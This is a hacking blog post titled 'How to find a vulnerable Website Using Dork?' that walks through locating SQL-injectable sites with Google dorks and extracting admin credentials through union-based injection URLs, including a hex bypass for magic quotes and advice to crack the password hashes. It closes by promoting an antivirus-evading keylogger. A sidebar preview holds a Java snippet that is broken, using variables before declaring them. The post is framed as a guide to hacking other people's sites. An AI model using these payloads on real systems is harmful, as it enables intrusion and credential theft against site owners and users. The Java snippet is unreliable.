Skip to main content

How to find a vulnerable Website Using Dork?

By RoCk StAr DeViL

How to find a vulnerable Website Using Dork?
And hack website
What is an SQL Injection?
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries).

The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.

SQL injection attacks are also known as SQL insertion attacks.How do I know if the site is vulnerable?Well, the most basic way to do it, and the easiest, would be to use an SQLi Scanner, such as Acunetix Web Vulnerability ScannerAlternatively, you can search manually using something called a "Dork".

So what is a dork?
A dork is a simple search used on google ( or other search engines ) that brings up sites you are specifically looking for.

List of Google Dork:

inurl:index.php?id=inurl:trainers.php?id=inurl:buy.php?category=inurl:article.php?ID=inurl:play_old.php?id=inurl:declaration_more.php?decl_id=inurl:Pageid=inurl:games.php?id=inurl:page.php?file=inurl:historialeer.php?num=

Using the manual method will take a lot of trial and error.Once you have your site, to check if it is vulnerable, simply add an apostrophe ( ' ) to the end of the url.Example:http://www.examplesite.com/category.php?id=5'

If the site is vulnerable, you will see the following error or something similar somewhere on the page.

" Error executing query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' ORDER BY date_added DESC' at line 1 "
"

If you get this, the site should be vulnerable. So far so good!How many columns?

Our next step is to find the number of columns in the database.

To do this we use the ORDER BY query. We get our normal site URL, and add

ORDER BY 1-- to the end of it. Example:Quote:http://www.examplesite.com/category.php?id=5order by 1--

The page should then show up as normal.

Now we have to increase this number until we get an error.Quote:http://www.examplesite.com/category.php?id=5order by 1-- No errorhttp://www.examplesite.com/category.php?id=5order by 2-- No errorhttp://www.examplesite.com/category.php?id=5order by 3-- ErrorWe got an error on 3, so that means our number of columns is 2

(The max column number before getting an error).

Union Select QueryWe use the union select statement to combine the results of multiple querys in our SQLi.

To test if it works, go to our sites normal URL, and write"union select 1,2--" (without quotes) after it.

In our example, we use 1,2--, but on other sites, you will usually have a different number of columns.

Example: On a site with 5 columns it would be"union select 1,2,3,4,5--".Quote:http://www.examplesite.com/category.php?id=-5union select 1,2--

Notice that there is a - in front of the 5. This is done to remove all text from the webpage, so we can see the results of our query on the page (Explanation. There isn't a -5 page anywhere on the site, so it uses the usual site template, but without the images and text of that specific page).

If union select worked, we should have no SQL errors.

We also should now see a few numbers on the page that normally aren't there. For our example,

we will say that both 1 and 2 showed upon our page.What SQL Version does my site use?This will be one of the easier things to do. After we have tested union (and it works!) we simply input "version()" in to one of the numbers in our URL, but these numbers have to be visible on the page, otherwise we won't be able to see the returned query result. Example:Quote:http://www.examplesite.com/category.php?id=-5union select 1,version()--This will replace the number 2 on our page with the SQL version. For our example we will use version 5 and above.Finding table namesNow we are going to get into the tables. This is where all the information you are looking for will be kept, but first, we need to find the table names.To do so, replace version() with group_concat(table_name). Then after your last column number, add from information_schema.tables--. Example:Quote:http://www.examplesite.com/category.php?id=-5union select 1,group_concat(table_name) from information_schema.tables--On the page you should now have a list of all the table names in the database.Finding the column namesTo find the column names we do the same thing, but replace tables with columns, but we include which table to get the column names from. If we found a table called admin. Example,Quote:http://www.examplesite.com/category.php?id=-5union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'--Q: I get an error when I do this, or no column names are shown!A: Magic quotes is on. To bypass this, you must convert the table name to Hex.You can do this by going to http://www.swingnote.com/tools/texttohex.php .Our query would now look like this:Quote:http://www.examplesite.com/category.php?id=-5union select 1,group_concat(column_name) from information_schema.columns where table_name=0x61646d696e --Note:the 0x tells the computer the following string is in hex

Lets say the column names were username and password.Final Step: Getting our information.To finish it off, we want to find out what the columns contain, otherwise, this has all been for nothing! To do so we get our normal site URL andadd "union select 1,concat(username,0x3a,password) from admin--".This will show the username and password from the table admin! Usually your password will be a hash,

so you can use an online MD5 Cracker suchas MD5Crack or use a program such as Cain and Abel to decrypt the password hash.


Keylogger:

Most of the public crypters and keyloggers are detected by antiviruses. If you want to have a FUD version of keylogger, please use best Hacking software- Winspy Keylogger which is FUD(Fully UnDetectable).So friends, I hope you will like thisEnjoy Website Hacking ........

Comments

Post a Comment

plz add ur comment here

Popular posts from this blog

Wordpress hacking - How to install / run wpscan on windows xp / windows 7 / windows 10

By RoCk StAr DeViL
HOW TO RUN WPSCAN ON WINDOWS Byrockstardevil Requirements: rubyinstaller Development Kit for rubyinstaller curl DLL for windows : libcurl.dll 1 - install rubyinstaller you must have Ruby 2.2.3 version . download links here : http://rubyinstaller.org/downloads/ for more info : https://github.com/oneclick/rubyinstaller/wiki 2 - install Development Kit for rubyinstaller download link : http://rubyinstaller.org/downloads/ how to install : https://github.com/oneclick/rubyinstaller/wiki/Development-Kit if you face that problem  "unknown encoding name -  (ArgumentError)" just type "chcp 1252" in cmd and hit enter 3 - install libcurl.dll A - Download libcurl.dll from : http://www.confusedbycode.com/curl/ B - copy libcurl.dll copy  libcurl.dll into ruby bin folder or wpscan folder and make sure to add it to your PATH. I also added .DLL to PATHEXT ex : C:\Ruby21-x64\bin\ you can visit : http://www.computerhope.com/issues/ch000549.htm to know to set the p
2 comments
Read more

How To Generate Random IP Address Using JAVA ?

By
Today I'll Show You How To Generate Random IP Address... But First Why I Want This...Right...? Ans : If You Want Test Your Code That Whether It Is Recognizing The Machine By It’s IP Address Then You Had To Use This Code To Generate Random IP Address. So Here We Goooo.... private String generateIPAddress ( int p1 , int p2 , int p3 ) { StringBuilder sb = null ; Random r1 = new Random (); Random r2 = new Random (); Random r3 = new Random (); Random r4 = new Random (); String ip1 = Integer . toString ( b1 ); String ip2 = Integer . toString ( b2 ); String ip3 = Integer . toString ( b3 ); String ip4 = Integer . toString ( b4 ); String b1 = IpConverter . longToIp ( r1 . nextLong ()); String b2 = IpConverter . longToIp ( r2 . nextLong ()); String b3 = IpConverter . longToIp ( r3 . nextLong ()); String b4 = IpConverter . longToIp ( r4 . nextLong ()); //Now the I
3 comments
Read more

3 Ways to Root Android 7.0 Nougat on Nexus Running Official AOSP [Update: Root Android 7.1]

By RoCk StAr DeViL
3 Ways to Root Android 7.0 Nougat on Nexus Running Official AOSP [Update: Root Android 7.1] If you own a Nexus phone then chances are you have already updated your device with the latest official Android 7.0 Nougat firmware. This brings the newer firmware build number NRD90M to the Nexus range including the Nexus 5X, 6P, 9, 6, Nexus Player, and the Pixel C. Unfortunately, Nexus 5 and 7 were left behind. This has been a game-changing week for the Android community as you can now expect the new software for your Android device soon enough. It may either come officially from a manufacturer or unofficially from developers like CyanogenMod. Just like we saw the unofficial support for the  Nexus 5 and the Nexus 7  today. As the new AOSP source code is now available to developers, soon you may find Cyanogen 14 based custom ROMS releasing for several devices. Hence, to be ready, you may need to be rooted and also setup a custom recovery like TWRP on your device. So that once the CM 14 bas
2 comments
Read more